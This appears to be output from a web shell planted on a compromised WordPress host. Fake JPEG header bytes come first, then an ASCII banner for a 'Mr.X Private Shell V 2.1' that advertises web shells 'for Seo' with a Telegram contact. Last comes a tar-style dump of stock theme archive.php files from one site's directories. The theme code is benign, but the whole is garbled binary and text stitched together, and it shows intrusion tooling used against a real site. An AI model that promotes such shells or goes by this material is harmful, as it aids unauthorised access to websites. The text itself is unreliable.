����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
home/eliteafr/www/wp-content/themes/twentytwentyone/archive.php 0000666 00000001746 15216536325 0021163 0 ustar 00 <?php
/**
* The template for displaying archive pages
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Twenty_One
* @since Twenty Twenty-One 1.0
*/
get_header();
$description = get_the_archive_description();
?>
<?php if ( have_posts() ) : ?>
<header class="page-header alignwide">
<?php the_archive_title( '<h1 class="page-title">', '</h1>' ); ?>
<?php if ( $description ) : ?>
<div class="archive-description"><?php echo wp_kses_post( wpautop( $description ) ); ?></div>
<?php endif; ?>
</header><!-- .page-header -->
<?php while ( have_posts() ) : ?>
<?php the_post(); ?>
<?php get_template_part( 'template-parts/content/content', get_theme_mod( 'display_excerpt_or_full_post', 'excerpt' ) ); ?>
<?php endwhile; ?>
<?php twenty_twenty_one_the_posts_navigation(); ?>
<?php else : ?>
<?php get_template_part( 'template-parts/content/content-none' ); ?>
<?php endif; ?>
<?php get_footer(); ?>
home/eliteafr/www/archive/wp-content/themes/twentytwentyone/archive.php 0000666 00000001746 15216561362 0022603 0 ustar 00 <?php
/**
* The template for displaying archive pages
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Twenty_One
* @since Twenty Twenty-One 1.0
*/
get_header();
$description = get_the_archive_description();
?>
<?php if ( have_posts() ) : ?>
<header class="page-header alignwide">
<?php the_archive_title( '<h1 class="page-title">', '</h1>' ); ?>
<?php if ( $description ) : ?>
<div class="archive-description"><?php echo wp_kses_post( wpautop( $description ) ); ?></div>
<?php endif; ?>
</header><!-- .page-header -->
<?php while ( have_posts() ) : ?>
<?php the_post(); ?>
<?php get_template_part( 'template-parts/content/content', get_theme_mod( 'display_excerpt_or_full_post', 'excerpt' ) ); ?>
<?php endwhile; ?>
<?php twenty_twenty_one_the_posts_navigation(); ?>
<?php else : ?>
<?php get_template_part( 'template-parts/content/content-none' ); ?>
<?php endif; ?>
<?php get_footer(); ?>
home/eliteafr/www/archive/wp-content/themes/twentynineteen/archive.php 0000666 00000002332 15216561464 0022347 0 ustar 00 <?php
/**
* The template for displaying archive pages
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Nineteen
* @since Twenty Nineteen 1.0
*/
get_header();
?>
<div id="primary" class="content-area">
<main id="main" class="site-main">
<?php if ( have_posts() ) : ?>
<header class="page-header">
<?php
the_archive_title( '<h1 class="page-title">', '</h1>' );
?>
</header><!-- .page-header -->
<?php
// Start the Loop.
while ( have_posts() ) :
the_post();
/*
* Include the Post-Format-specific template for the content.
* If you want to override this in a child theme, then include a file
* called content-___.php (where ___ is the Post Format name) and that
* will be used instead.
*/
get_template_part( 'template-parts/content/content', 'excerpt' );
// End the loop.
endwhile;
// Previous/next page navigation.
twentynineteen_the_posts_navigation();
// If no content, include the "No posts found" template.
else :
get_template_part( 'template-parts/content/content', 'none' );
endif;
?>
</main><!-- #main -->
</div><!-- #primary -->
<?php
get_footer();
home/eliteafr/www/wp-content/themes/cosmica/archive.php 0000666 00000001260 15216600041 0017244 0 ustar 00 <?php get_header(); ?>
<div class="container">
<div id="content-area" class="clearfix">
<main class="main-content col-md-9 col-sm-12">
<div class="masonry-posts">
<?php get_template_part( 'includes/loop', 'index' ); ?>
</div>
<div class="clearfix"></div>
<div id="pagination">
<?php echo paginate_links(array('prev_next' => true, 'prev_text' => __('« Previous Page','cosmica'), 'next_text' => __('Next Page »','cosmica'))); ?>
</div>
<div class="clearfix"></div>
</main>
<?php get_sidebar(); ?>
<div class="clearfix"></div>
</div> <!-- #content-area -->
</div> <!-- .container -->
<?php get_footer();?>
home/eliteafr/www/wp-content/themes/twentynineteen/archive.php 0000666 00000002332 15220507430 0020712 0 ustar 00 <?php
/**
* The template for displaying archive pages
*
* @link https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Nineteen
* @since Twenty Nineteen 1.0
*/
get_header();
?>
<div id="primary" class="content-area">
<main id="main" class="site-main">
<?php if ( have_posts() ) : ?>
<header class="page-header">
<?php
the_archive_title( '<h1 class="page-title">', '</h1>' );
?>
</header><!-- .page-header -->
<?php
// Start the Loop.
while ( have_posts() ) :
the_post();
/*
* Include the Post-Format-specific template for the content.
* If you want to override this in a child theme, then include a file
* called content-___.php (where ___ is the Post Format name) and that
* will be used instead.
*/
get_template_part( 'template-parts/content/content', 'excerpt' );
// End the loop.
endwhile;
// Previous/next page navigation.
twentynineteen_the_posts_navigation();
// If no content, include the "No posts found" template.
else :
get_template_part( 'template-parts/content/content', 'none' );
endif;
?>
</main><!-- #main -->
</div><!-- #primary -->
<?php
get_footer();
home/eliteafr/www/archive/wp-content/themes/cosmica/archive.php 0000666 00000001260 15220541144 0020670 0 ustar 00 <?php get_header(); ?>
<div class="container">
<div id="content-area" class="clearfix">
<main class="main-content col-md-9 col-sm-12">
<div class="masonry-posts">
<?php get_template_part( 'includes/loop', 'index' ); ?>
</div>
<div class="clearfix"></div>
<div id="pagination">
<?php echo paginate_links(array('prev_next' => true, 'prev_text' => __('« Previous Page','cosmica'), 'next_text' => __('Next Page »','cosmica'))); ?>
</div>
<div class="clearfix"></div>
</main>
<?php get_sidebar(); ?>
<div class="clearfix"></div>
</div> <!-- #content-area -->
</div> <!-- .container -->
<?php get_footer();?>
home/eliteafr/datapro/wp-content/themes/hestia/archive.php 0000666 00000003220 15221125506 0017713 0 ustar 00 <?php
/**
* The main template file
*
* This is the most generic template file in a WordPress theme
* and one of the two required files for a theme (the other being style.css).
* It is used to display a page when nothing more specific matches a query.
* e.g., it puts together the home page when no home.php file exists.
*
* Learn more: {@link https://codex.wordpress.org/Template_Hierarchy}
*
* @package Hestia
* @since Hestia 1.0
* @modified 1.1.30
*/
get_header();
$default = hestia_get_blog_layout_default();
$sidebar_layout = apply_filters( 'hestia_sidebar_layout', get_theme_mod( 'hestia_blog_sidebar_layout', $default ) );
$wrapper_classes = apply_filters( 'hestia_filter_archive_content_classes', 'col-md-8 archive-post-wrap' );
do_action( 'hestia_before_archive_content' );
?>
<div class="<?php echo hestia_layout(); ?>">
<div class="hestia-blogs" data-layout="<?php echo esc_attr( $sidebar_layout ); ?>">
<div class="container">
<div class="row">
<?php
if ( $sidebar_layout === 'sidebar-left' ) {
get_sidebar();
}
?>
<div class="<?php echo esc_attr( $wrapper_classes ); ?>">
<?php
if ( have_posts() ) :
while ( have_posts() ) :
the_post();
get_template_part( 'template-parts/content' );
endwhile;
do_action( 'hestia_before_pagination' );
the_posts_pagination();
do_action( 'hestia_after_pagination' );
else :
get_template_part( 'template-parts/content', 'none' );
endif;
?>
</div>
<?php
if ( $sidebar_layout === 'sidebar-right' ) {
get_sidebar();
}
?>
</div>
</div>
</div>
</div>
<?php
get_footer(); ?>